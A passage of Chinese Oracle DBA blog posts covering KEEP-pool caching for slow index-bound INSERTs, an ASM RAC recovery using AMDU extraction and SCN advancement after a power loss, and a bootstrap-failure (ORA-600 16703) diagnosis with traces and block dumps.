本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: Insert into is very slowly,why ?

上周运营商客户的计费库反应其入库程序很慢,应用方通过监控程序发现主要慢在对于几个表的insert操作上。按照我们的通常理解,insert应该是极快的,为什么会很慢呢?而且反应之前挺好的。这有点让我百思不得其解。通过检查event也并没有发现什么奇怪的地方,于是我通过10046 跟踪了应用的入库程序,如下应用方反应比较慢的表的insert操作,确实非常慢,如下所示:

INSERT INTO XXXX_EVENT_201605C (ROAMING_NBR,.....,OFFER_INSTANCE_ID4)
VALUES
 (:ROAMING_NBR,.....:OFFER_INSTANCE_ID4) 

call     count       cpu    elapsed       disk      query    current        rows
------- ------  -------- ---------- ---------- ---------- ----------  ----------
Parse       17      0.00       0.00          0          0          0           0
Execute     18      1.06      27.41       4534        518      33976        4579
Fetch        0      0.00       0.00          0          0          0           0
------- ------  -------- ---------- ---------- ---------- ----------  ----------
total       35      1.06      27.41       4534        518      33976        4579

Misses in library cache during parse: 1
Misses in library cache during execute: 1
Optimizer mode: ALL_ROWS
Parsing user id: 102  

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  db file sequential read                      4495        0.03         24.02
  gc current grant 2-way                       2301        0.00          0.77
  SQL*Net more data from client                 795        0.00          0.02
  ......
  latch: gcs resource hash                        1        0.00          0.00

我们可以发现,insert了4579条数据,一共花了27.41秒;其中有24.02秒是处于等待的状态。而且等待事件为顺序读.

很明显这通常是索引的读取操作,实际上检查10046 trace 裸文件,发现等待的对象确实是该表上的2个index。
同时我们从上面10046 trace可以看出,该SQL执行之所以很慢,主要是因为存在了大量的物理读,其中4579条数据的insert,
物理读为4534;这说明什么问题呢? 这说明,每插入一条数据大概产生一个物理读,而且都是index block的读取。
很明显,通过将该index cache到keep 池可以解决该问题。 实际上也确实如此,通过cache后,应用反馈程序快了很多。
那么对该问题,这里其实有几个疑问,为什么这里的SQL insert时物理读如此之高? oracle的keep pool对于缓存对象
的清理机制是如何的?

下面我们通过一个简单的实验来进行说明。

首先我们创建2个测试表,并创建好相应的index,如下所示:

SQL> conn roger/roger
Connected.
SQL> create table t_insert as select * from sys.dba_objects where 1=1;

Table created.
SQL> create index idx_name_t on t_insert(object_name);

Index created.

SQL> analyze table t_insert compute statistics for all indexed columns;

Table analyzed.

SQL> select INDEX_NAME,BLEVEL,LEAF_BLOCKS,DISTINCT_KEYS,CLUSTERING_FACTOR,NUM_ROWS from dba_indexes where table_name='T_INSERT';

INDEX_NAME        BLEVEL LEAF_BLOCKS DISTINCT_KEYS CLUSTERING_FACTOR   NUM_ROWS
------------- ---------- ----------- ------------- ----------------- ----------
IDX_NAME_T             1         246         29808             24664      49859

SQL> show parameter db_keep

NAME                                 TYPE        VALUE
------------------------------------ ----------- --------
db_keep_cache_size                   big integer 0
SQL> alter system set db_keep_cache_size=4m;

System altered.

SQL> create table t_insert2 as select * from sys.dba_objects where 1=1;

Table created.

SQL> create index idx_name_t2 on t_insert2(object_name); 

Index created.
SQL> insert into t_insert select * from sys.dba_objects;

49862 rows created.

SQL> commit;

Commit complete.

SQL> insert into t_insert2 select * from sys.dba_objects;

49862 rows created.

SQL> commit;

Commit complete.

从前面的信息我们可以看出,object_name上的index其实聚簇因子比较高,说明其数据分布比较离散。
接着我们现在将index都cache 到keep 池中,如下:

SQL> alter index idx_name_t storage (buffer_pool keep);

Index altered.

SQL> alter index idx_name_t2 storage (buffer_pool keep);

Index altered.
SQL> alter system flush buffer_cache;

System altered.

这里需要注意的是,仅仅执行alter 命令是不够的,我们还需要手工将index block读取到keep池中,如下:

SQL> conn /as sysdba
Connected.
SQL> @get_keep_pool_obj.sql

no rows selected

SQL> select /*+ index(idx_name_t,t_insert) */ count(object_name) from roger.t_insert;

COUNT(OBJECT_NAME)
------------------
             99721

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
KEEP         IDX_NAME_T                            499
DEFAULT      T_INSERT                              431

SQL> select /*+ index(idx_name_t2,t_insert2) */ count(object_name) from roger.t_insert2;

COUNT(OBJECT_NAME)
------------------
             99723

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
KEEP         IDX_NAME_T                             40
KEEP         IDX_NAME_T2                           459
DEFAULT      T_INSERT2                             522
DEFAULT      T_INSERT                              431

SQL> select /*+ index(idx_name_t,t_insert) */ count(object_name) from roger.t_insert;

COUNT(OBJECT_NAME)
------------------
             99721

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
KEEP         IDX_NAME_T                            467
KEEP         IDX_NAME_T2                            32
DEFAULT      T_INSERT2                             522
DEFAULT      T_INSERT                              431

SQL>

我们可以大致看出,db keep pool 也是存在LRU的,而且对于block的清除机制是先进先出原则。那么为什么前面的问题中,insert会突然变慢呢?

下面我们来进行3次insert 测试。

#### one

SQL> select /*+ index_ffs(idx_name_t,t_insert) */ count(object_name) from roger.t_insert;

COUNT(OBJECT_NAME)
------------------
            149583

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
DEFAULT      SQLPLUS_PRODUCT_PROFILE                 1
DEFAULT      RLM$SCHACTIONORDER                      1
DEFAULT      RLM$JOINQKEY                            1
KEEP         IDX_NAME_T                            499
DEFAULT      T_INSERT2                            2113
DEFAULT      T_INSERT                             2113

6 rows selected.
SQL> oradebug setmypid
Statement processed.
SQL> oradebug event 10046 trace name context forever,level 12
Statement processed.
SQL> set timing on
SQL> insert into roger.t_insert select * from sys.dba_objects;

49862 rows created.

Elapsed: 00:00:03.28
SQL> commit;

Commit complete.

Elapsed: 00:00:00.00
SQL> oradebug tracefile_name
/home/oracle/admin/test/udump/test_ora_11661.trc

++++10046 trace

insert into roger.t_insert select * from sys.dba_objects

call     count       cpu    elapsed       disk      query    current        rows
------- ------  -------- ---------- ---------- ---------- ----------  ----------
Parse        1      0.01       0.01          0          0          0           0
Execute      1      0.95       3.07       3289      11592      96374       49862
Fetch        0      0.00       0.00          0          0          0           0
------- ------  -------- ---------- ---------- ---------- ----------  ----------
total        2      0.96       3.08       3289      11592      96374       49862
.....

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  db file sequential read                      3168        0.00          0.50
  db file scattered read                          1        0.00          0.00

#### two

SQL> oradebug setmypid
Statement processed.
SQL> oradebug event 10046 trace name context forever,level 12
Statement processed.
SQL> oradebug tracefile_name
/home/oracle/admin/test/udump/test_ora_13163.trc
SQL> set timing on
SQL> insert into roger.t_insert select * from sys.dba_objects;

49825 rows created.

++++10046 trace

insert into roger.t_insert select * from sys.dba_objects

call     count       cpu    elapsed       disk      query    current        rows
------- ------  -------- ---------- ---------- ---------- ----------  ----------
Parse        1      0.01       0.01          0          0          0           0
Execute      1      0.87       3.10       3817       8134      87352       49825
Fetch        0      0.00       0.00          0          0          0           0
------- ------  -------- ---------- ---------- ---------- ----------  ----------
total        2      0.88       3.11       3817       8134      87352       49825
.....

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  db file sequential read                      3827        0.00          0.56

#### three

SQL> oradebug setmypid
Statement processed.
SQL> oradebug event 10046 trace name context forever,level 12
Statement processed.
SQL> set timing on
SQL> insert into roger.t_insert select * from sys.dba_objects;

49825 rows created.

Elapsed: 00:00:03.94
SQL> commit;

Commit complete.

Elapsed: 00:00:00.01
SQL> oradebug tracefile_name
/home/oracle/admin/test/udump/test_ora_13286.trc
SQL> select /*+ index_ffs(idx_name_t,t_insert) */ count(object_name) from roger.t_insert;

COUNT(OBJECT_NAME)
------------------
            249233

SQL> @get_keep_pool_obj.sql

SUBCACHE     OBJECT_NAME                        BLOCKS
------------ ------------------------------ ----------
DEFAULT      SQLPLUS_PRODUCT_PROFILE                 1
......
DEFAULT      RLM$JOINQKEY                            1
KEEP         IDX_NAME_T                            499

++++10046 trace
insert into roger.t_insert select * from sys.dba_objects

call     count       cpu    elapsed       disk      query    current        rows
------- ------  -------- ---------- ---------- ---------- ----------  ----------
Parse        1      0.00       0.00          0          0          0           0
Execute      1      1.60       3.84       7598      13208     104820       49825
Fetch        0      0.00       0.00          0          0          0           0
------- ------  -------- ---------- ---------- ---------- ----------  ----------
total        2      1.60       3.84       7598      13208     104820       49825
.....

Elapsed times include waiting on following events:
  Event waited on                             Times   Max. Wait  Total Waited
  ----------------------------------------   Waited  ----------  ------------
  db file sequential read                      7618        0.00          1.07
  free buffer waits                             224        0.02          1.30

从测试来看,随着表的数据越来越大,insert的效率会越来越低,也其实主要在于index的问题。
我们可以发现,3次测试过程中,物理读越来越大,而且db file sequential read的等待时间分别从0.5秒,增加到0.56秒,最后增加到1.07秒。 为什么会出现这样的情况呢?
随着表数据的日益增加,导致表上的index也不断增大,同时index的离散度比较高,这样就导致每次insert时,oracle在进行index block读取时,可能在buffer cache中都无法命中相应的block;这样就会导致每次读取需要的index block时,可能都要进行物理读,这势必会导致性能问题的出现。
同时默认的default buffer cache pool虽然也可以缓存index 块,但是也要同时缓存其他的数据块,这样很容易导致
相关的index block被从buffer cache pool中移走。所以这也是前面为什么需要将index cache到keep 池的原因。

Related posts:

  1. 11g 新特性之–query result cache(3)

耗时一周的某客户Oracle RAC(4 TB ASM) 数据库恢复记录

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 耗时一周的某客户Oracle RAC(4 TB ASM) 数据库恢复记录

6月底我们接到某客户的紧急支持请求,其客户数据库在不久前由于机房停电,导致数据库重启后无法启动。

我们通过teamviewer远程初步分析了alert log以及kfed读取了几个disk 发现,数据库无法启动的根本原因在于ASM diskgroup无法mount。而ASM diskgroup 无法mount的根本原因在于,ASM元数据出现损坏,其中表现为ASM 启动时无法进行事务恢复。

这里我们先不去纠结为什么会坏。对于asm的元数据如果出现损坏,那么修复的难度可想而知。

这里我采取了非常简单的数据库恢复方案,计划用AMDU抽取数据库文件,然后将数据库open,最后再重建原数据库磁盘组,最后通过Oracle rman 的backup as copy 方式将数据库还原回去。

想象是比较美好的,经过与客户长达1天的沟通协调之后,发现客户根本协调不到存储资源,而数据库环境本地可以空间也就不足100G。我们知道,整个数据库的磁盘组是6TB,其中数据库文件大约在4T左右,显然这是比较麻烦的事情。

无奈之下,客户从京东买了一个6TB的移动硬盘,经过一番努力之后,挂上移动硬盘,通过AMDU抽取文件测试,发现速度大约为5m/s。这是一个500m的undo文件复制到移动硬盘的速度测试:

root@jlzgdb1 # time dd if=/amdu/datafiles/undotbs2.dbf of=/data/undo_test.dbf bs=8192
64001+0 records in
64001+0 records out

real     1:23.7
user        0.2
sys         2.2

大家可以计算一下,大约需要10天左右。这样是这样进行下去,那么整个恢复过程估计需要15天了,这是无法接受的。

后面跟客户了解了一下,客户的应用服务器是windows环境,我通过在windows共享文件,NFS共享到soalris,测试amdu抽取文件的速度大约可以达到15m/s。虽然这也是非常之慢的,但是相比之前已经好很多了,客户也可以接受了。

这里不得不说一下windows和Soalris之间配置NFS共享,也是一个比较麻烦的事情。折腾了几个小时才搞定这个问题。这里我简单记录一下配置的步骤,如下:

--solaris 启动nfs服务
svcadm -v enable -r network/nfs/server

--windows

安装nfs服务

设置文件夹共享,nfs共享

设置用户映射
nfsfile /v /ru=-2 /rg=-2 /s /cx F:\oradata

---soalris挂载nfs

mount 172.16.30.212:/oradata   /data

后续的步骤相对就简单了,都是传统的数据库恢复套路。如下是AMDU抽取文件的步骤:

......
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.316   -output /data1/irms_data.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.317   -output /data1/irms_data_his.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.318   -output /data1/irms_index.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.319   -output /data1/irms_index_his.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.326   -output /data1/gis_data.dbf
./amdu -dis '/dev/rdsk/emcpower*' -extract JLZGRACGROUP.323   -output /data1/gis_index.dbf
......

这里我们需要注意的是,amdu不仅可以抽取数据文件,还可以抽取spfile、controlfile、以及redo、archivelog等。

对于AMDU工具抽取文件的过程,就单纯的命令而言,这是比较简单的。其中的关键就是我们必须知道文件在ASM diskgroup中对应的asm file number号。注意,这里的file number,并非数据库(DB)中的file number。

Oracle ASM的元数据中,其中alias directory 里面记录了数据库文件和asm 之间的一个映射关系。也就是说我们只要能够通过kfed读取alias 的数据,也就能够知道数据文件的asm file number是多少。

当然,很多情况之下,如果你添加数据库文件是alter tablespace xxx add datafile ‘+DATA’  …这样的方式,那么直接查询控制文件即可获得asm file number。这里不多说。

最后我dbv check了一下数据库文件,发现就undo存在几个坏块,其他文件均ok。不过比较郁闷的是,进行正常recover database恢复时,提示需要recover的归档找不到。这是怎么一回事呢?

我们来看下数据库文件头的scn 情况。

我们可以发现,从文件头的scn来看,差距大概在3个小时左右。而recover 时也确实需要比较旧的archivelog。而这中间差距的几个小时的归档,我们通过kfed 读取asm diskgroup元数据发现并没有找到。

为什么会丢失呢?其实很简单,可能这3个小时的归档也就6个archivelog,很可能在存储cache中,并没有写入到磁盘上。那么当掉电之后,这几个archivelog 肯定也丢失了。

当归档不全的情况之下,我们amdu抽取的current redo logfile已经没有意义了。我们只能将该数据库强制open,然后重建数据库。这里我简单描述一下数据库的open过程,以及恢复过程中遇到的一些错误:

首先利用amdu 抽取的控制文件进行mount,发现报如下错误:

Sat Jul  2 23:05:15 2016
ALTER DATABASE   MOUNT
Sat Jul  2 23:05:19 2016
Errors in file /var/datang/oracle/admin/xxx/udump/xxx1_ora_6919.trc:
ORA-00600: internal error code, arguments: [kccpb_sanity_check_2], [3811063], [3770626], [0x000000000], [], [], [], []
Sat Jul  2 23:05:19 2016
ORA-600 signalled during: ALTER DATABASE   MOUNT...
Sat Jul  2 23:05:20 2016

 

 

这个错误很常见,我们在数据库恢复过程中经常碰到该错误。假设你是第一次遇到这个错误,你该如何判断该错误是什么问题?跟什么东西有关系呢?从ORA-00600错误的关键字,kccpb可以看出,这跟控制文件有关系,其中还包含了check关键字。说明这是在数据库mount过程中,进行某些check检查,发现了某些数据异常。那么后面的2个数字:3811063,3770626是什么意思呢?

有人或许会说,这有没有可能是scn?这里不排除这种可能性,如果你稍微有一定经验,那么很容易排除这个可能性。为什么?

首先对于一个运行超过3年的Oracle数据库,scn不可能这么小。其次从Oracle 10g开始,会自动产生snap controlfile的备份,在ORACLE_HOME/dbs目录下,我们可以利用该备份进行mount,然后去检查数据库文件的scn情况。

那么这个错误到底是什么意思呢?这里我猜测肯定是某个sequence number的东西,Oracle在mount的过程中认为读取的数据应该是3811063,但是实际上读取的数据确实3770626,2者之间存在差异。也就是说,Oracle认为控制文件已经损坏。

实际上,Oracle metalink 针对该错误进行了详细描述,其实也提供了解决方案,供大家参考:ORA-00600: [kccpb_sanity_check_2] During Instance Startup (文档 ID 435436.1)

看过该文档的人应该都知道,解决该错误的方法就是利用备份进行恢复,要么就是重建控制文件。既然如此,那么我们就来重建控制文件吧:

CREATE CONTROLFILE REUSE DATABASE "JLZGDB" NORESETLOGS  ARCHIVELOG
    MAXLOGFILES 192
    MAXLOGMEMBERS 3
    MAXDATAFILES 1024
    MAXINSTANCES 32
    MAXLOGHISTORY 18688
LOGFILE
  GROUP 1 (
    '/data1/redo12.log',
    '/data1/redo11.log'
  ) SIZE 100M,
  GROUP 2 (
    '/data1/redo22.log',
    '/data1/redo21.log'
  ) SIZE 100M,
  GROUP 3 (
    '/data1/redo31.log',
    '/data1/redo32.log'
  ) SIZE 100M,
  GROUP 4 (
    '/data1/redo41.log',
    '/data1/redo42.log'
  ) SIZE 100M
-- STANDBY LOGFILE
DATAFILE
  '/amdu/datafiles/system01.dbf',
  '/amdu/datafiles/undotbs1.dbf',
  '/amdu/datafiles/sysaux.dbf',
  '/amdu/datafiles/users.dbf',
  '/amdu/datafiles/undotbs2.dbf',
  '/data1/irms_data.dbf',
  '/data1/irms_data_his.dbf',
  '/data1/irms_index.dbf',
  '/data1/irms_index_his.dbf',
  '/data1/gis_data.dbf',
  '/data1/gis_index.dbf',
  '/data1/ams_java_data.dbf',
  '/data1/rdms_itf.dbf',
  '/data1/rdms_data.dbf',
  '/data1/rdms_app.dbf',
  '/data1/rdms_indxitf.dbf',
  '/data1/rdms_indxdata.dbf',
  '/data1/rdms_indxapp.dbf',
  '/data1/sde.dbf',
  '/data1/bjdvdata.dbf',
  '/amdu/datafiles/undotbs3.dbf',
  '/data1/nc_data01.dbf'
CHARACTER SET ZHS16GBK
;

重建完毕之后,进行一次不完全恢复,然后尝试直接open数据库,发现遇到如下错误:

Sat Jul  2 23:36:08 2016
Errors in file /var/datang/oracle/admin/jlzgdb/udump/xxx1_ora_22249.trc:
ORA-00600: internal error code, arguments: [2662], [7], [1821589910], [7], [1821750102], [8388617], [], []
Sat Jul  2 23:36:09 2016
Errors in file /var/datang/oracle/admin/xxx/udump/xxx1_ora_22249.trc:
ORA-00600: internal error code, arguments: [2662], [7], [1821589910], [7], [1821750102], [8388617], [], []
Sat Jul  2 23:36:09 2016
Error 600 happened during db open, shutting down database
USER: terminating instance due to error 600
Instance terminated by USER, pid = 22249

这个错误也很常见。很多人都已经知道如何处理这种情况下,那就是推进SCN。那么这里如何推进scn呢?

由于该数据库是Oracle 10g,且没有安装最新的psu;因此我们可以直接使用oracle 10015 event来推进scn,命令如下:

alter session set events ’10015 trace name adjust_scn level n’;

其中的n表示level,那么这个level应该是多少呢?应该是4*7=28,为了稳妥期间,我们一般设置比28稍微大一点,因此可以设置30.

经过10015 event的处理之后,再次open数据库,你会发现数据库已经open了,但是很快就会crash。因为会如下错误:

*********************************************************************
Database Characterset is ZHS16GBK
Opening with internal Resource Manager plan
where NUMA PG = 1, CPUs = 64
Sat Jul  2 23:49:14 2016
Errors in file /var/datang/oracle/admin/jlzgdb/udump/jlzgdb1_ora_27273.trc:
ORA-00600: internal error code, arguments: [4194], [58], [41], [], [], [], [], []
Doing block recovery for file 2 block 33408
Block recovery from logseq 1, block 61 to scn 32212254769
Sat Jul  2 23:49:15 2016

同一,该错误也太常见了。我们知道,对于ORA-00600 后面的错误编号,如果是在4000–6000的范围中,那么表示跟undo有关系。实际上我们之前dbv检查文件也确实发现undo有极少量的坏块存在。那么这里怎么处理这个问题呢?

既然undo存在文件,那么我们知道数据库在open的时候需要进行事务的rollback,而事务回滚则跟undo存在极大关系。那么这里我们可以通过几种方式来解决该问题:

1、通过undo_manangment=manual

2、._offline_rollback_segments

3、10513 event来禁止smon 进行事务恢复.

很明显,这里我选择第一种方式,更为简单,通过修改pfile即可很快解决该问题。通过参数修改很顺利打开了数据库,然后检查alert log发现会有如下类似的错误:

Sat Jul  2 23:59:20 2016
Errors in file /var/datang/oracle/admin/xxx/bdump/xxx1_j004_6045.trc:
ORA-12012: error on auto execute of job 42567
ORA-08102: index key not found, obj# , file , block  ()
ORA-08102: index key not found, obj# ORA-08102: index key not found, obj# 5099, file 1, block 11186 (2)
, file , block  ()

该错误,我相信不少同学都遇到过。从该错误的提示来看,就非常明确了,index key not found。也就是说这是index的问题。那么是什么对象呢? 也就是我们的obj# 5099。 对于object号大于56的,那么我们可以直接rebuild处理。

alert log中其实还有一些其他的错误,这里我们不在一一列举说明。前面已经提到过,由于cache丢失,那么数据库中的很多数据可能都不一致,如果通过修复alert log中的错误,然后提供业务运行,那么存在极大的风险。因此建议重建数据库比较好一些。

这里我们首先将undo进行重建处理,这样可以绕过很多错误,接着开始进行数据库重建工作。

补充:

提供几篇文档供大家参考:

Step by step to resolve ORA-600 4194 4193 4197 on database crash (文档 ID 1428786.1)

 

Related posts:

  1. 11.2.0.4 ASM RAC 恢复一个例子
  2. 清明节加班恢复的一个11gR2 rac恢复案例

数据库重启之后无法open的恢复案例

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 数据库重启之后无法open的恢复案例

这是某网友的维护的一套数据库,据说是正常重启之后就无法启动数据库了。那么我们先来看看日志是什么样的:

Errors in file /u01/app/oracle/admin/orcl/bdump/orcl1_p012_18165.trc:
ORA-27090: Message 27090 not found;  product=RDBMS; facility=ORA
Linux-x86_64 Error: 4: Interrupted system call
Additional information: 3
Additional information: 128
Additional information: 65536
.....
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl1_p007_18153.trc:
ORA-27090: Message 27090 not found;  product=RDBMS; facility=ORA
Linux-x86_64 Error: 4: Interrupted system call
Additional information: 3
Additional information: 128
Additional information: 65536
Starting ORACLE instance (normal)
LICENSE_MAX_SESSION = 0
.....
SMON: enabling cache recovery
Errors in file /u01/app/oracle/admin/orcl/udump/orcl1_ora_8858.trc:
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [], [], []
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl1_ora_8858.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [], [], []
.....
Error 704 happened during db open, shutting down database
USER: terminating instance due to error 704

我们可以看到,节点1在9:48:52秒被强行终止重启了实例。而且我们还可以看出该节点从9:42开始就出现ORA-27090 错误。而该错误通常跟操作系统有关系,通过后面的Linux-x86_64 Error: 4: Interrupted system call 错误也验证了这一点。

Thread 2 advanced to log sequence 334685 (LGWR switch)
  Current log# 4 seq# 334685 mem# 0: +DATA/orcl/onlinelog/group_4.log
.....
Starting ORACLE instance (normal)
LICENSE_MAX_SESSION = 0
.....
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_mmon_9401.trc:
ORA-07445: Message 7445 not found; No message file for product=RDBMS, facility=ORA; arguments: [kgghteFindCB()+188] [SIGSEGV] [Address not mapped to object] [0x00000010B]
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl2_ora_9475.trc:
ORA-07445: exception encountered: core dump [kglsget()+490] [SIGSEGV] [Address not mapped to object] [0x000000008] [] []
.....
Error 0 in kwqmnpartition(), aborting txn
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl2_ora_9943.trc:
ORA-00600: internal error code, arguments: [kggfaAllocFunc1], [], [], [], [], [], [], []
.....
ORA-00600: internal error code, arguments: [kggfaAllocFunc1], [], [], [], [], [], [], []
.....
ORA-65535 encountered when generating server alert SMG-4131
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl2_ora_9943.trc:
ORA-00600: internal error code, arguments: [kggfaAllocFunc1], [], [], [], [], [], [], []
.....
Reconfiguration started (old inc 2, new inc 4)
List of nodes:
 0 1
 Global Resource Directory frozen
 Communication channels reestablished
 * domain 0 valid = 1 according to instance 0
......
Completed redo application
.....
Errors in file /u01/app/oracle/admin/orcl/udump/orcl2_ora_10551.trc:
ORA-00600: internal error code, arguments: [kggfaAllocFunc1], [], [], [], [], [], [], []
.....
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_smon_9395.trc:
ORA-00600: Message 600 not found; No message file for product=RDBMS, facility=ORA; arguments: [16659] [kqldtu] [D] [0] [65]
.....
Redo Shipping Client Connected as PUBLIC
-- Connected User is Valid
......
Non-fatal internal error happenned while SMON was doing cursor transient type cleanup.
SMON encountered 1 out of maximum 100 non-fatal internal errors.
.....
Trace dumping is performing id=[cdmp_20160802094934]
.....
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_smon_9395.trc:
ORA-00600: Message 600 not found; No message file for product=RDBMS, facility=ORA; arguments: [16659] [kqldtu] [D] [0] [195]
.....
Non-fatal internal error happenned while SMON was doing cursor transient type cleanup.
SMON encountered 2 out of maximum 100 non-fatal internal errors.
......
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_pmon_9349.trc:
ORA-00474: Message 474 not found; No message file for product=RDBMS, facility=ORA
......
PMON: terminating instance due to error 474
......
Errors in file /u01/app/oracle/admin/orcl/bdump/orcl2_lmon_9355.trc:
ORA-00474: Message 474 not found; No message file for product=RDBMS, facility=ORA
.....
System state dump is made for local instance
System State dumped to trace file /u01/app/oracle/admin/orcl/bdump/orcl2_diag_9351.trc
......
Shutting down instance (abort)
License high water mark = 72
......
Trace dumping is performing id=[cdmp_20160802095002]
.....
Instance terminated by PMON, pid = 9349
.....
Instance terminated by USER, pid = 11027
.....
Starting ORACLE instance (normal)

这里我们无论是看节点1还是节点2的alert log日志都会发现,由于smon进程在进程事务恢复时失败之后,导致数据库实例最终宕掉。宕掉之后就再也无法正常启动了。很明显这是强行关库之后带来的蝴蝶效应。
这里我们来看看其中节点2的这个ORA-00600 [16559]是什么含义?

ERROR: ORA-600 [16659] [a] [b] [c] [d] [e]
VERSIONS: versions 8.0 to 8.1
DESCRIPTION: We are attempting to update a tab$ row and fail to update the dictionary information correctly.
FUNCTIONALITY: DATA DICTIONARY IMPACT: PROCESS FAILURE POSSIBLE DATA DICTIONARY INCONSISTENCY

从解释来看,这是Oracle 数据字典表tab$出现了不一致的情况。比较郁闷的是,客户的dataguard也坏掉了,也是一样的错误。
那么看来只能进行恢复了。这里首先要明白,节点1的ora-00600 [16703]本质上来讲跟ora-00600 [16559]是一回事。
从具体的错误来看,Oracle在open时,进行bootstrap初始化的过程就失败了,因此报错ORA-00704: bootstrap process failure.
处理思路也很简单,我们首先通过10046 trace跟踪open的过程,来看看Oracle 在bootstrap初始化的时候在进行什么操作时报错的?

PARSING IN CURSOR #2 len=106 dep=1 uid=0 oct=3 lid=0 tim=1435661277781458 hv=3628073639 ad='cfd74588'
select rowcnt,blkcnt,empcnt,avgspc,chncnt,avgrln,nvl(degree,1), nvl(instances,1) from tab$ where obj# = :1
END OF STMT
PARSE #2:c=999,e=676,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1435661277781453
=====================
.....
BINDS #2:
kkscoacd
 Bind#0
  oacdty=02 mxl=22(22) mxlc=00 mal=00 scl=00 pre=00
  oacflg=08 fl2=0001 frm=00 csi=00 siz=24 off=0
  kxsbbbfp=2b5f7bae1b00  bln=22  avl=02  flg=05
  value=20
EXEC #2:c=999,e=1015,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1435661277798049
WAIT #2: nam='db file sequential read' ela= 1086 file#=1 block#=50 blocks=1 obj#=-1 tim=1435661277799253
WAIT #2: nam='db file sequential read' ela= 568 file#=1 block#=51 blocks=1 obj#=-1 tim=1435661277799931
WAIT #2: nam='db file sequential read' ela= 1804 file#=1 block#=26 blocks=1 obj#=-1 tim=1435661277801863
FETCH #2:c=0,e=3833,p=3,cr=3,cu=0,mis=0,r=0,dep=1,og=4,tim=1435661277801922
*** 2016-08-02 13:52:28.469
ksedmp: internal or fatal error
ORA-00600: internal error code, arguments: [16703], [1403], [20], [], [], [], [], []
Current SQL statement for this session:
alter database open

从上面的错误不难看出就是在访问tab$ 的时候报错的,而且是访问的obj#=20的这个对象。那么这个对象是什么呢?

SQL> select owner,object_name,object_type from dba_objects where object_id=20;

OWNER                          OBJECT_NAME                    OBJECT_TYPE
------------------------------ ------------------------------ -------------------
SYS                            ICOL$                          TABLE

SQL> !oerr ora 1403
01403, 00000, "no data found"
// *Cause:
// *Action:

根据我们的查询以及对ORA-00600 [16703],[1403],[20] 这个错误的理解,那么我这里可以大致判断这个错误后的几个数字的含义:
16703: 错误代码,表示数据字典基表存在不一致1403: 表示数据没找到或者不匹配,即not data found.20: 表示访问的对象号,即object_id.
同时我们从前面的10046 trace跟踪来看,报错的SQL语句访问了3个block,然后报错,分别是file 1 block 50,51,26。
这我们分别dump 上面的3个block发现其中block 51,26 的dump 内容如下:

---block 51
Object id on Block? Y
 seg/obj: 0x3  csc: 0x00.64205  itc: 2  flg: -  typ: 2 - INDEX
     fsl: 0  fnx: 0x0 ver: 0x01

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x0001.008.0000000d  0x0080118a.0010.01  CB--    0  scn 0x0000.000105c7
0x02   0x000a.01e.000005e0  0x008074fc.007a.36  --U-    1  fsc 0x0000.00064208

Leaf block dump
===============
header address 185777756=0xb12be5c
kdxcolev 0
KDXCOLEV Flags = - - -
kdxcolok 0
kdxcoopc 0x80: opcode=0: iot flags=--- is converted=Y
kdxconco 1
kdxcosdc 2
kdxconro 258
kdxcofbo 552=0x228
kdxcofeo 4484=0x1184
kdxcoavs 3932
kdxlespl 0
kdxlende 0
kdxlenxt 4194360=0x400038
kdxleprv 0=0x0
kdxledsz 8
kdxlebksz 8032
...
row#93[5724] flag: ------, lock: 2, len=14, data:(8):  00 40 38 8e 00 06 02 00
col 0; len 3; (3):  c2 03 03
......

---block 26
Block header dump:  0x0040001a
 Object id on Block? Y
 seg/obj: 0x2  csc: 0x05.e0568950  itc: 2  flg: -  typ: 1 - DATA
     fsl: 0  fnx: 0x0 ver: 0x01

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x0000.05f.00000002  0x00400012.0001.16  C---    0  scn 0x0000.000000fd
0x02   0x000b.00d.00048164  0x0100982b.b8bd.4d  --U-    7  fsc 0x039f.e0568c3e

data_block_dump,data header at 0xb12be5c
===============
tsiz: 0x1fa0
hsiz: 0x140
pbl: 0x0b12be5c
bdba: 0x0040001a
     76543210
flag=--------
ntab=6
nrow=141
frre=-1
fsbo=0x140
fseo=0x160
avsp=0x20
tosp=0x3db
0xe:pti[0]      nrow=8  offs=0
0x12:pti[1]     nrow=7  offs=8
